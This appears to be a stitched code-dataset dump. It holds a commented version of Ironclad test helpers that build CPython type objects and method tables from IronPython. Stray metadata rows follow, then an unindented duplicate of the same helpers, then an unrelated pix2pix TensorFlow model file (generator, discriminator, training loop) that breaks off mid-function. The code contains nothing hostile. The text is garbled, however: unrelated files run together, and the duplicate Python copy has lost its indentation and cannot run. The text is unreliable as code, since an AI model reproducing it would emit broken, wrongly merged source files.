    release -- it exists only to mirror MakeMethodDef/MakeGetSetDef.
    """
    member = new_PyMemberDef(name, int(type_), offset, flags, doc)
    no_cleanup = lambda: None
    return member, no_cleanup
# Baseline slot values for MakeTypePtr; anything supplied by the caller's
# params dict (or by GetMapperTypePtrDefaults) overrides these.
MAKETYPEPTR_DEFAULTS = {
    "tp_name": "Nemo",
    "tp_doc": "Odysseus' reply to the blinded Cyclops",
    "ob_refcnt": 1,
    "tp_basicsize": 8,
    "tp_itemsize": 4,
    "tp_flags": Py_TPFLAGS.HAVE_CLASS,
    # table slots default to empty
    "tp_methods": None,
    "tp_members": None,
    "tp_getset": None,
    # function-pointer slots default to unset
    "tp_init": None,
    "tp_iter": None,
    "tp_iternext": None,
    # pointer slots default to NULL
    "tp_base": IntPtr.Zero,
    "tp_bases": IntPtr.Zero,
    "tp_as_number": IntPtr.Zero,
}
def GetMapperTypePtrDefaults(mapper):
    """Return the type-slot defaults that must come from a live mapper.

    These slots point at functions owned by *mapper*, so unlike
    MAKETYPEPTR_DEFAULTS they cannot be module-level constants.
    """
    defaults = {}
    defaults["ob_type"] = mapper.PyType_Type
    defaults["tp_alloc"] = mapper.PyType_GenericAlloc
    defaults["tp_new"] = mapper.PyType_GenericNew
    defaults["tp_dealloc"] = mapper.IC_PyBaseObject_Dealloc
    defaults["tp_free"] = mapper.PyObject_Free
    return defaults
# Slot-name groups: WriteTypeField marshals each group differently.
PTR_ARGS = ("ob_type", "tp_base", "tp_bases", "tp_as_number", "tp_as_sequence", "tp_as_mapping")
INT_ARGS = ("ob_refcnt", "tp_basicsize", "tp_itemsize", "tp_flags")
STRING_ARGS = ("tp_name", "tp_doc")
TABLE_ARGS = ("tp_methods", "tp_members", "tp_getset")
# Function-pointer slots, each mapped to the delegate type that matches
# the slot's C signature.
FUNC_ARGS = {
    "tp_alloc": Ironclad.dgt_ptr_ptrint,
    "tp_new": Ironclad.dgt_ptr_ptrptrptr,
    "tp_init": Ironclad.dgt_int_ptrptrptr,
    "tp_dealloc": Ironclad.dgt_void_ptr,
    "tp_free": Ironclad.dgt_void_ptr,
    "tp_getattr": Ironclad.dgt_ptr_ptrstr,
    "tp_iter": Ironclad.dgt_ptr_ptr,
    "tp_iternext": Ironclad.dgt_ptr_ptr,
    "tp_call": Ironclad.dgt_ptr_ptrptrptr,
    "tp_str": Ironclad.dgt_ptr_ptr,
    "tp_repr": Ironclad.dgt_ptr_ptr,
    "tp_richcompare": Ironclad.dgt_ptr_ptrptrint,
    "tp_compare": Ironclad.dgt_int_ptrptr,
    "tp_hash": Ironclad.dgt_int_ptr,
}
def WriteTypeField(typePtr, name, value):
    """Write one named slot of the PyTypeObject at *typePtr*.

    Returns a zero-argument cleanup callable that frees whatever this
    write allocated (marshalled strings, item tables, delegate pins);
    plain pointer/int writes get a no-op cleanup.  Raises KeyError for a
    slot name that belongs to none of the known groups.
    """
    no_op = lambda: None
    if name in PTR_ARGS:
        CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, value)
        return no_op
    elif name in INT_ARGS:
        CPyMarshal.WriteIntField(typePtr, PyTypeObject, name, int(value))
        return no_op
    elif name in STRING_ARGS:
        strPtr = Marshal.StringToHGlobalAnsi(value)
        CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, strPtr)
        return lambda: Marshal.FreeHGlobal(strPtr)
    elif name in TABLE_ARGS:
        tablePtr, dealloc = MakeItemsTablePtr(value)
        CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, tablePtr)
        return dealloc
    elif name in FUNC_ARGS:
        if value is None:
            return no_op
        delegate = FUNC_ARGS[name](value)
        CPyMarshal.WriteFunctionPtrField(typePtr, PyTypeObject, name, delegate)
        return GC_NotYet(delegate)
    raise KeyError("WriteTypeField can't handle %s, %s" % (name, value))
def MakeTypePtr(mapper, params, allocator=None):
    """Build a native PyTypeObject from defaults overridden by *params*.

    Returns a (typePtr, dealloc) pair.  dealloc runs the cleanups that
    each slot write registered; the deallocs list preserves registration
    order, which is why this function is not freely reorderable.
    """
    fields = dict(MAKETYPEPTR_DEFAULTS)
    fields.update(GetMapperTypePtrDefaults(mapper))
    fields.update(params)
    deallocs = []
    typeSize = Marshal.SizeOf(PyTypeObject)
    if allocator:
        # pretend this was constructed by a C extension, using the mapper's allocator
        # hence mapper should do the deallocation itself
        typePtr = allocator.Alloc(typeSize)
    else:
        typePtr = Marshal.AllocHGlobal(typeSize)
        deallocs.append(lambda: Marshal.FreeHGlobal(typePtr))
    CPyMarshal.Zero(typePtr, typeSize)
    # each write returns its own cleanup (string frees, delegate pins, ...)
    for field, value in fields.items():
        deallocs.append(WriteTypeField(typePtr, field, value))
    def dealloc():
        for f in deallocs:
            f()
    return typePtr, dealloc
def MakeItemsTablePtr(items):
    """Marshal *items* (structs of a single type) into a native array.

    The array gets one extra zeroed slot as a terminator, CPython-style.
    Returns (tablePtr, cleanup); an empty/None *items* yields IntPtr.Zero
    and a no-op cleanup.
    """
    if not items:
        return IntPtr.Zero, lambda: None
    itemtype = items[0].__class__
    stride = Marshal.SizeOf(itemtype)
    total = stride * (len(items) + 1)
    tablePtr = Marshal.AllocHGlobal(total)
    CPyMarshal.Zero(tablePtr, total)
    offset = 0
    for item in items:
        Marshal.StructureToPtr(item, OffsetPtr(tablePtr, offset), False)
        offset += stride
    def dealloc():
        Marshal.DestroyStructure(tablePtr, itemtype)
        Marshal.FreeHGlobal(tablePtr)
    return tablePtr, dealloc
# Maps PyNumberMethods/PySequenceMethods/PyMappingMethods slot names to the
# delegate type matching each slot's C signature; consumed by
# MakeNumSeqMapMethods below.
NUMSEQMAP_METHODS = {
    # unary number slots
    "nb_negative": Ironclad.dgt_ptr_ptr,
    "nb_positive": Ironclad.dgt_ptr_ptr,
    "nb_absolute": Ironclad.dgt_ptr_ptr,
    "nb_invert": Ironclad.dgt_ptr_ptr,
    "nb_int": Ironclad.dgt_ptr_ptr,
    "nb_long": Ironclad.dgt_ptr_ptr,
    "nb_float": Ironclad.dgt_ptr_ptr,
    "nb_oct": Ironclad.dgt_ptr_ptr,
    "nb_hex": Ironclad.dgt_ptr_ptr,
    "nb_index": Ironclad.dgt_ptr_ptr,
    # binary number slots
    "nb_add": Ironclad.dgt_ptr_ptrptr,
    "nb_subtract": Ironclad.dgt_ptr_ptrptr,
    "nb_multiply": Ironclad.dgt_ptr_ptrptr,
    "nb_divide": Ironclad.dgt_ptr_ptrptr,
    "nb_floor_divide": Ironclad.dgt_ptr_ptrptr,
    "nb_true_divide": Ironclad.dgt_ptr_ptrptr,
    "nb_remainder": Ironclad.dgt_ptr_ptrptr,
    "nb_divmod": Ironclad.dgt_ptr_ptrptr,
    "nb_lshift": Ironclad.dgt_ptr_ptrptr,
    "nb_rshift": Ironclad.dgt_ptr_ptrptr,
    "nb_and": Ironclad.dgt_ptr_ptrptr,
    "nb_xor": Ironclad.dgt_ptr_ptrptr,
    "nb_or": Ironclad.dgt_ptr_ptrptr,
    # in-place number slots
    "nb_inplace_add": Ironclad.dgt_ptr_ptrptr,
    "nb_inplace_subtract": Ironclad.dgt_ptr_ptrptr,
    "nb_inplace_multiply": Ironclad.dgt_ptr_ptrptr,
    "nb_inplace_divide": Ironclad.dgt_ptr_ptrptr,
    "nb_inplace_floor_divide": Ironclad.dgt_ptr_ptrptr,
    "nb_inplace_true_divide": Ironclad.dgt_ptr_ptrptr,
    "nb_inplace_remainder": Ironclad.dgt_ptr_ptrptr,
    "nb_inplace_lshift": Ironclad.dgt_ptr_ptrptr,
    "nb_inplace_rshift": Ironclad.dgt_ptr_ptrptr,
    "nb_inplace_and": Ironclad.dgt_ptr_ptrptr,
    "nb_inplace_xor": Ironclad.dgt_ptr_ptrptr,
    "nb_inplace_or": Ironclad.dgt_ptr_ptrptr,
    "nb_nonzero": Ironclad.dgt_int_ptr,
    # ternary power slots
    "nb_power": Ironclad.dgt_ptr_ptrptrptr,
    "nb_inplace_power": Ironclad.dgt_ptr_ptrptrptr,
    # sequence slots
    "sq_item": Ironclad.dgt_ptr_ptrint,
    "sq_concat": Ironclad.dgt_ptr_ptrptr,
    "sq_repeat": Ironclad.dgt_ptr_ptrint,
    "sq_slice": Ironclad.dgt_ptr_ptrintint,
    "sq_ass_item": Ironclad.dgt_int_ptrintptr,
    "sq_ass_slice": Ironclad.dgt_int_ptrintintptr,
    "sq_length": Ironclad.dgt_int_ptr,
    "sq_contains": Ironclad.dgt_int_ptrptr,
    # mapping slots
    "mp_length": Ironclad.dgt_int_ptr,
    "mp_subscript": Ironclad.dgt_ptr_ptrptr,
    "mp_ass_subscript": Ironclad.dgt_int_ptrptrptr,
}
def MakeNumSeqMapMethods(_type, slots):
    """Allocate and fill a native number/sequence/mapping methods struct.

    *slots* maps slot names to callables; each is wrapped in the delegate
    type from NUMSEQMAP_METHODS and written into the struct.  Returns
    (ptr, cleanup); cleanup unpins every delegate and frees the struct.
    """
    structSize = Marshal.SizeOf(_type)
    methodsPtr = Marshal.AllocHGlobal(structSize)
    CPyMarshal.Zero(methodsPtr, structSize)
    cleanups = []
    for (slotName, impl) in slots.items():
        delegate = NUMSEQMAP_METHODS[slotName](impl)
        CPyMarshal.WriteFunctionPtrField(methodsPtr, _type, slotName, delegate)
        cleanups.append(GC_NotYet(delegate))
    def dealloc():
        for release in cleanups:
            release()
        Marshal.FreeHGlobal(methodsPtr)
    return methodsPtr, dealloc
| 35.426357
| 110
| 0.67954
|
from System import IntPtr
from System.Runtime.InteropServices import Marshal
import Ironclad
from Ironclad import CPyMarshal
from Ironclad.Structs import METH, Py_TPFLAGS, PyGetSetDef, PyMemberDef, PyMethodDef, PyTypeObject
from tests.utils.memory import OffsetPtr
def _new_struct(type_, fields, *values):
struct = type_()
for field, value in zip(fields, values):
getattr(type_, field).SetValue(struct, value)
return struct
_meth_fields = 'ml_name ml_meth ml_flags ml_doc'.split()
new_PyMethodDef = lambda *args: _new_struct(PyMethodDef, _meth_fields, *args)
_getset_fields = 'name get set doc closure'.split()
new_PyGetSetDef = lambda *args: _new_struct(PyGetSetDef, _getset_fields, *args)
_member_fields = 'name type offset flags doc'.split()
new_PyMemberDef = lambda *args: _new_struct(PyMemberDef, _member_fields, *args)
gc_fooler = []
def GC_NotYet(dgt):
gc_fooler.append(dgt)
def GC_Soon():
gc_fooler.remove(dgt)
return GC_Soon
DELEGATE_TYPES = {
METH.OLDARGS: Ironclad.dgt_ptr_ptrptr,
METH.O: Ironclad.dgt_ptr_ptrptr,
METH.NOARGS: Ironclad.dgt_ptr_ptrptr,
METH.VARARGS: Ironclad.dgt_ptr_ptrptr,
METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr,
METH.VARARGS | METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr,
}
for (k, v) in DELEGATE_TYPES.items():
DELEGATE_TYPES[k | METH.COEXIST] = v
def MakeMethodDef(name, implementation, flags, doc="doc"):
dgt = DELEGATE_TYPES[flags](implementation)
return new_PyMethodDef(name, Marshal.GetFunctionPointerForDelegate(dgt), int(flags), doc), GC_NotYet(dgt)
def MakeGetSetDef(name, get, set, doc, closure=IntPtr.Zero):
deallocs = []
_get = IntPtr.Zero
if get:
getdgt = Ironclad.dgt_ptr_ptrptr(get)
_get = Marshal.GetFunctionPointerForDelegate(getdgt)
deallocs.append(GC_NotYet(getdgt))
_set = IntPtr.Zero
if set:
setdgt = Ironclad.dgt_int_ptrptrptr(set)
_set = Marshal.GetFunctionPointerForDelegate(setdgt)
deallocs.append(GC_NotYet(setdgt))
return new_PyGetSetDef(name, _get, _set, doc, closure), lambda: map(apply, deallocs)
def MakeMemberDef(name, type_, offset, flags, doc="doc"):
return new_PyMemberDef(name, int(type_), offset, flags, doc), lambda: None
MAKETYPEPTR_DEFAULTS = {
"tp_name": "Nemo",
"tp_doc": "Odysseus' reply to the blinded Cyclops",
"ob_refcnt": 1,
"tp_basicsize": 8,
"tp_itemsize": 4,
"tp_flags": Py_TPFLAGS.HAVE_CLASS,
"tp_methods": None,
"tp_members": None,
"tp_getset": None,
"tp_init": None,
"tp_iter": None,
"tp_iternext": None,
"tp_base": IntPtr.Zero,
"tp_bases": IntPtr.Zero,
"tp_as_number": IntPtr.Zero,
}
def GetMapperTypePtrDefaults(mapper):
return {
"ob_type": mapper.PyType_Type,
"tp_alloc": mapper.PyType_GenericAlloc,
"tp_new": mapper.PyType_GenericNew,
"tp_dealloc": mapper.IC_PyBaseObject_Dealloc,
"tp_free": mapper.PyObject_Free,
}
PTR_ARGS = ("ob_type", "tp_base", "tp_bases", "tp_as_number", "tp_as_sequence", "tp_as_mapping")
INT_ARGS = ("ob_refcnt", "tp_basicsize", "tp_itemsize", "tp_flags")
STRING_ARGS = ("tp_name", "tp_doc")
TABLE_ARGS = ("tp_methods", "tp_members", "tp_getset")
FUNC_ARGS = {
"tp_alloc": Ironclad.dgt_ptr_ptrint,
"tp_new": Ironclad.dgt_ptr_ptrptrptr,
"tp_init": Ironclad.dgt_int_ptrptrptr,
"tp_dealloc": Ironclad.dgt_void_ptr,
"tp_free": Ironclad.dgt_void_ptr,
"tp_getattr": Ironclad.dgt_ptr_ptrstr,
"tp_iter": Ironclad.dgt_ptr_ptr,
"tp_iternext": Ironclad.dgt_ptr_ptr,
"tp_call": Ironclad.dgt_ptr_ptrptrptr,
"tp_str": Ironclad.dgt_ptr_ptr,
"tp_repr": Ironclad.dgt_ptr_ptr,
"tp_richcompare": Ironclad.dgt_ptr_ptrptrint,
"tp_compare": Ironclad.dgt_int_ptrptr,
"tp_hash": Ironclad.dgt_int_ptr,
}
def WriteTypeField(typePtr, name, value):
if name in PTR_ARGS:
CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, value)
return lambda: None
if name in INT_ARGS:
CPyMarshal.WriteIntField(typePtr, PyTypeObject, name, int(value))
return lambda: None
if name in STRING_ARGS:
ptr = Marshal.StringToHGlobalAnsi(value)
CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr)
return lambda: Marshal.FreeHGlobal(ptr)
if name in TABLE_ARGS:
ptr, dealloc = MakeItemsTablePtr(value)
CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr)
return dealloc
if name in FUNC_ARGS:
if value is not None:
dgt = FUNC_ARGS[name](value)
CPyMarshal.WriteFunctionPtrField(typePtr, PyTypeObject, name, dgt)
return GC_NotYet(dgt)
return lambda: None
raise KeyError("WriteTypeField can't handle %s, %s" % (name, value))
def MakeTypePtr(mapper, params, allocator=None):
fields = dict(MAKETYPEPTR_DEFAULTS)
fields.update(GetMapperTypePtrDefaults(mapper))
fields.update(params)
deallocs = []
typeSize = Marshal.SizeOf(PyTypeObject)
if allocator:
# hence mapper should do the deallocation itself
typePtr = allocator.Alloc(typeSize)
else:
typePtr = Marshal.AllocHGlobal(typeSize)
deallocs.append(lambda: Marshal.FreeHGlobal(typePtr))
CPyMarshal.Zero(typePtr, typeSize)
for field, value in fields.items():
deallocs.append(WriteTypeField(typePtr, field, value))
def dealloc():
for f in deallocs:
f()
return typePtr, dealloc
def MakeItemsTablePtr(items):
if not items:
return IntPtr.Zero, lambda: None
itemtype = items[0].__class__
typesize = Marshal.SizeOf(itemtype)
size = typesize * (len(items) + 1)
tablePtr = Marshal.AllocHGlobal(size)
CPyMarshal.Zero(tablePtr, size)
for i, item in enumerate(items):
Marshal.StructureToPtr(item, OffsetPtr(tablePtr, typesize * i), False)
def dealloc():
Marshal.DestroyStructure(tablePtr, itemtype)
Marshal.FreeHGlobal(tablePtr)
return tablePtr, dealloc
NUMSEQMAP_METHODS = {
"nb_negative": Ironclad.dgt_ptr_ptr,
"nb_positive": Ironclad.dgt_ptr_ptr,
"nb_absolute": Ironclad.dgt_ptr_ptr,
"nb_invert": Ironclad.dgt_ptr_ptr,
"nb_int": Ironclad.dgt_ptr_ptr,
"nb_long": Ironclad.dgt_ptr_ptr,
"nb_float": Ironclad.dgt_ptr_ptr,
"nb_oct": Ironclad.dgt_ptr_ptr,
"nb_hex": Ironclad.dgt_ptr_ptr,
"nb_index": Ironclad.dgt_ptr_ptr,
"nb_add": Ironclad.dgt_ptr_ptrptr,
"nb_subtract": Ironclad.dgt_ptr_ptrptr,
"nb_multiply": Ironclad.dgt_ptr_ptrptr,
"nb_divide": Ironclad.dgt_ptr_ptrptr,
"nb_floor_divide": Ironclad.dgt_ptr_ptrptr,
"nb_true_divide": Ironclad.dgt_ptr_ptrptr,
"nb_remainder": Ironclad.dgt_ptr_ptrptr,
"nb_divmod": Ironclad.dgt_ptr_ptrptr,
"nb_lshift": Ironclad.dgt_ptr_ptrptr,
"nb_rshift": Ironclad.dgt_ptr_ptrptr,
"nb_and": Ironclad.dgt_ptr_ptrptr,
"nb_xor": Ironclad.dgt_ptr_ptrptr,
"nb_or": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_add": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_subtract": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_multiply": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_divide": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_floor_divide": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_true_divide": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_remainder": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_lshift": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_rshift": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_and": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_xor": Ironclad.dgt_ptr_ptrptr,
"nb_inplace_or": Ironclad.dgt_ptr_ptrptr,
"nb_nonzero": Ironclad.dgt_int_ptr,
"nb_power": Ironclad.dgt_ptr_ptrptrptr,
"nb_inplace_power": Ironclad.dgt_ptr_ptrptrptr,
"sq_item": Ironclad.dgt_ptr_ptrint,
"sq_concat": Ironclad.dgt_ptr_ptrptr,
"sq_repeat": Ironclad.dgt_ptr_ptrint,
"sq_slice": Ironclad.dgt_ptr_ptrintint,
"sq_ass_item": Ironclad.dgt_int_ptrintptr,
"sq_ass_slice": Ironclad.dgt_int_ptrintintptr,
"sq_length": Ironclad.dgt_int_ptr,
"sq_contains": Ironclad.dgt_int_ptrptr,
"mp_length": Ironclad.dgt_int_ptr,
"mp_subscript": Ironclad.dgt_ptr_ptrptr,
"mp_ass_subscript": Ironclad.dgt_int_ptrptrptr,
}
def MakeNumSeqMapMethods(_type, slots):
size = Marshal.SizeOf(_type)
ptr = Marshal.AllocHGlobal(size)
CPyMarshal.Zero(ptr, size)
deallocs = []
for (slot, func) in slots.items():
dgt = NUMSEQMAP_METHODS[slot](func)
CPyMarshal.WriteFunctionPtrField(ptr, _type, slot, dgt)
deallocs.append(GC_NotYet(dgt))
def dealloc():
for f in deallocs:
f()
Marshal.FreeHGlobal(ptr)
return ptr, dealloc
| true
| true
|
f705d6e28e10770948eaf92986fd5dda9272df1d
| 19,432
|
py
|
Python
|
model.py
|
UrusuLambda/pix2pix-tensorflow
|
9b1e832494f8b8b36ad2d0331cb5feda5bd65ce0
|
[
"MIT"
] | 1,014
|
2016-11-25T14:03:59.000Z
|
2022-03-26T14:57:07.000Z
|
model.py
|
Chediak/pix2pix-tensorflow
|
ba40020706ad3a1fbefa1da7bc7a05b7b031fb9e
|
[
"MIT"
] | 35
|
2016-11-27T14:31:40.000Z
|
2020-10-19T15:37:14.000Z
|
model.py
|
Chediak/pix2pix-tensorflow
|
ba40020706ad3a1fbefa1da7bc7a05b7b031fb9e
|
[
"MIT"
] | 349
|
2016-11-25T15:50:09.000Z
|
2022-02-28T21:16:21.000Z
|
from __future__ import division
import os
import time
from glob import glob
import tensorflow as tf
import numpy as np
from six.moves import xrange
from ops import *
from utils import *
class pix2pix(object):
def __init__(self, sess, image_size=256,
batch_size=1, sample_size=1, output_size=256,
gf_dim=64, df_dim=64, L1_lambda=100,
input_c_dim=3, output_c_dim=3, dataset_name='facades',
checkpoint_dir=None, sample_dir=None):
"""
Args:
sess: TensorFlow session
batch_size: The size of batch. Should be specified before training.
output_size: (optional) The resolution in pixels of the images. [256]
gf_dim: (optional) Dimension of gen filters in first conv layer. [64]
df_dim: (optional) Dimension of discrim filters in first conv layer. [64]
input_c_dim: (optional) Dimension of input image color. For grayscale input, set to 1. [3]
output_c_dim: (optional) Dimension of output image color. For grayscale input, set to 1. [3]
"""
self.sess = sess
self.is_grayscale = (input_c_dim == 1)
self.batch_size = batch_size
self.image_size = image_size
self.sample_size = sample_size
self.output_size = output_size
self.gf_dim = gf_dim
self.df_dim = df_dim
self.input_c_dim = input_c_dim
self.output_c_dim = output_c_dim
self.L1_lambda = L1_lambda
# batch normalization : deals with poor initialization helps gradient flow
self.d_bn1 = batch_norm(name='d_bn1')
self.d_bn2 = batch_norm(name='d_bn2')
self.d_bn3 = batch_norm(name='d_bn3')
self.g_bn_e2 = batch_norm(name='g_bn_e2')
self.g_bn_e3 = batch_norm(name='g_bn_e3')
self.g_bn_e4 = batch_norm(name='g_bn_e4')
self.g_bn_e5 = batch_norm(name='g_bn_e5')
self.g_bn_e6 = batch_norm(name='g_bn_e6')
self.g_bn_e7 = batch_norm(name='g_bn_e7')
self.g_bn_e8 = batch_norm(name='g_bn_e8')
self.g_bn_d1 = batch_norm(name='g_bn_d1')
self.g_bn_d2 = batch_norm(name='g_bn_d2')
self.g_bn_d3 = batch_norm(name='g_bn_d3')
self.g_bn_d4 = batch_norm(name='g_bn_d4')
self.g_bn_d5 = batch_norm(name='g_bn_d5')
self.g_bn_d6 = batch_norm(name='g_bn_d6')
self.g_bn_d7 = batch_norm(name='g_bn_d7')
self.dataset_name = dataset_name
self.checkpoint_dir = checkpoint_dir
self.build_model()
    def build_model(self):
        """Construct the pix2pix graph: generator, discriminator, losses, summaries."""
        # real_data packs two images along the channel axis.
        self.real_data = tf.placeholder(tf.float32,
                                        [self.batch_size, self.image_size, self.image_size,
                                         self.input_c_dim + self.output_c_dim],
                                        name='real_A_and_B_images')
        # NOTE(review): the first input_c_dim channels become real_B and the
        # remainder real_A -- confirm this matches the data loader's order.
        self.real_B = self.real_data[:, :, :, :self.input_c_dim]
        self.real_A = self.real_data[:, :, :, self.input_c_dim:self.input_c_dim + self.output_c_dim]
        self.fake_B = self.generator(self.real_A)
        # Conditional GAN: the discriminator sees the input image A
        # concatenated with either the real or the generated B.
        self.real_AB = tf.concat([self.real_A, self.real_B], 3)
        self.fake_AB = tf.concat([self.real_A, self.fake_B], 3)
        # Second discriminator call reuses the first call's variables.
        self.D, self.D_logits = self.discriminator(self.real_AB, reuse=False)
        self.D_, self.D_logits_ = self.discriminator(self.fake_AB, reuse=True)
        self.fake_B_sample = self.sampler(self.real_A)
        self.d_sum = tf.summary.histogram("d", self.D)
        self.d__sum = tf.summary.histogram("d_", self.D_)
        self.fake_B_sum = tf.summary.image("fake_B", self.fake_B)
        # Discriminator: real pairs -> 1, fake pairs -> 0.
        self.d_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits, labels=tf.ones_like(self.D)))
        self.d_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.zeros_like(self.D_)))
        # Generator: adversarial term plus L1 reconstruction weighted by L1_lambda.
        self.g_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.ones_like(self.D_))) \
                        + self.L1_lambda * tf.reduce_mean(tf.abs(self.real_B - self.fake_B))
        self.d_loss_real_sum = tf.summary.scalar("d_loss_real", self.d_loss_real)
        self.d_loss_fake_sum = tf.summary.scalar("d_loss_fake", self.d_loss_fake)
        self.d_loss = self.d_loss_real + self.d_loss_fake
        self.g_loss_sum = tf.summary.scalar("g_loss", self.g_loss)
        self.d_loss_sum = tf.summary.scalar("d_loss", self.d_loss)
        # Split trainables by name prefix so each optimizer only updates
        # its own network.
        t_vars = tf.trainable_variables()
        self.d_vars = [var for var in t_vars if 'd_' in var.name]
        self.g_vars = [var for var in t_vars if 'g_' in var.name]
        self.saver = tf.train.Saver()
def load_random_samples(self):
data = np.random.choice(glob('./datasets/{}/val/*.jpg'.format(self.dataset_name)), self.batch_size)
sample = [load_data(sample_file) for sample_file in data]
if (self.is_grayscale):
sample_images = np.array(sample).astype(np.float32)[:, :, :, None]
else:
sample_images = np.array(sample).astype(np.float32)
return sample_images
def sample_model(self, sample_dir, epoch, idx):
sample_images = self.load_random_samples()
samples, d_loss, g_loss = self.sess.run(
[self.fake_B_sample, self.d_loss, self.g_loss],
feed_dict={self.real_data: sample_images}
)
save_images(samples, [self.batch_size, 1],
'./{}/train_{:02d}_{:04d}.png'.format(sample_dir, epoch, idx))
print("[Sample] d_loss: {:.8f}, g_loss: {:.8f}".format(d_loss, g_loss))
    def train(self, args):
        """Train pix2pix.

        Alternates one discriminator update with two generator updates per
        batch, writing summaries each step, sampling every 100 steps and
        checkpointing every 500.
        """
        d_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \
                          .minimize(self.d_loss, var_list=self.d_vars)
        g_optim = tf.train.AdamOptimizer(args.lr, beta1=args.beta1) \
                          .minimize(self.g_loss, var_list=self.g_vars)
        init_op = tf.global_variables_initializer()
        self.sess.run(init_op)
        self.g_sum = tf.summary.merge([self.d__sum,
            self.fake_B_sum, self.d_loss_fake_sum, self.g_loss_sum])
        self.d_sum = tf.summary.merge([self.d_sum, self.d_loss_real_sum, self.d_loss_sum])
        self.writer = tf.summary.FileWriter("./logs", self.sess.graph)
        counter = 1
        start_time = time.time()
        # Resume from a checkpoint when one exists; training continues
        # either way.
        if self.load(self.checkpoint_dir):
            print(" [*] Load SUCCESS")
        else:
            print(" [!] Load failed...")
        for epoch in xrange(args.epoch):
            data = glob('./datasets/{}/train/*.jpg'.format(self.dataset_name))
            #np.random.shuffle(data)
            batch_idxs = min(len(data), args.train_size) // self.batch_size
            for idx in xrange(0, batch_idxs):
                batch_files = data[idx*self.batch_size:(idx+1)*self.batch_size]
                batch = [load_data(batch_file) for batch_file in batch_files]
                if (self.is_grayscale):
                    # add trailing channel axis for single-channel data
                    batch_images = np.array(batch).astype(np.float32)[:, :, :, None]
                else:
                    batch_images = np.array(batch).astype(np.float32)
                # Update D network
                _, summary_str = self.sess.run([d_optim, self.d_sum],
                    feed_dict={ self.real_data: batch_images })
                self.writer.add_summary(summary_str, counter)
                # Update G network
                _, summary_str = self.sess.run([g_optim, self.g_sum],
                    feed_dict={ self.real_data: batch_images })
                self.writer.add_summary(summary_str, counter)
                # Run g_optim twice to make sure that d_loss does not go to zero (different from paper)
                _, summary_str = self.sess.run([g_optim, self.g_sum],
                    feed_dict={ self.real_data: batch_images })
                self.writer.add_summary(summary_str, counter)
                # Separate eval calls re-run the forward pass purely for logging.
                errD_fake = self.d_loss_fake.eval({self.real_data: batch_images})
                errD_real = self.d_loss_real.eval({self.real_data: batch_images})
                errG = self.g_loss.eval({self.real_data: batch_images})
                counter += 1
                print("Epoch: [%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f" \
                    % (epoch, idx, batch_idxs,
                        time.time() - start_time, errD_fake+errD_real, errG))
                if np.mod(counter, 100) == 1:
                    self.sample_model(args.sample_dir, epoch, idx)
                if np.mod(counter, 500) == 2:
                    self.save(args.checkpoint_dir, counter)
def discriminator(self, image, y=None, reuse=False):
with tf.variable_scope("discriminator") as scope:
# image is 256 x 256 x (input_c_dim + output_c_dim)
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h0 = lrelu(conv2d(image, self.df_dim, name='d_h0_conv'))
# h0 is (128 x 128 x self.df_dim)
h1 = lrelu(self.d_bn1(conv2d(h0, self.df_dim*2, name='d_h1_conv')))
# h1 is (64 x 64 x self.df_dim*2)
h2 = lrelu(self.d_bn2(conv2d(h1, self.df_dim*4, name='d_h2_conv')))
# h2 is (32x 32 x self.df_dim*4)
h3 = lrelu(self.d_bn3(conv2d(h2, self.df_dim*8, d_h=1, d_w=1, name='d_h3_conv')))
# h3 is (16 x 16 x self.df_dim*8)
h4 = linear(tf.reshape(h3, [self.batch_size, -1]), 1, 'd_h3_lin')
return tf.nn.sigmoid(h4), h4
    def generator(self, image, y=None):
        """U-Net generator: 8 encoder convs, 8 decoder deconvs with skip
        connections from each encoder level to the mirrored decoder level;
        dropout on the first three decoder layers; tanh output."""
        with tf.variable_scope("generator") as scope:
            s = self.output_size
            # spatial sizes at each halving of the output resolution
            s2, s4, s8, s16, s32, s64, s128 = int(s/2), int(s/4), int(s/8), int(s/16), int(s/32), int(s/64), int(s/128)
            # image is (256 x 256 x input_c_dim)
            e1 = conv2d(image, self.gf_dim, name='g_e1_conv')
            # e1 is (128 x 128 x self.gf_dim)
            e2 = self.g_bn_e2(conv2d(lrelu(e1), self.gf_dim*2, name='g_e2_conv'))
            # e2 is (64 x 64 x self.gf_dim*2)
            e3 = self.g_bn_e3(conv2d(lrelu(e2), self.gf_dim*4, name='g_e3_conv'))
            # e3 is (32 x 32 x self.gf_dim*4)
            e4 = self.g_bn_e4(conv2d(lrelu(e3), self.gf_dim*8, name='g_e4_conv'))
            # e4 is (16 x 16 x self.gf_dim*8)
            e5 = self.g_bn_e5(conv2d(lrelu(e4), self.gf_dim*8, name='g_e5_conv'))
            # e5 is (8 x 8 x self.gf_dim*8)
            e6 = self.g_bn_e6(conv2d(lrelu(e5), self.gf_dim*8, name='g_e6_conv'))
            # e6 is (4 x 4 x self.gf_dim*8)
            e7 = self.g_bn_e7(conv2d(lrelu(e6), self.gf_dim*8, name='g_e7_conv'))
            # e7 is (2 x 2 x self.gf_dim*8)
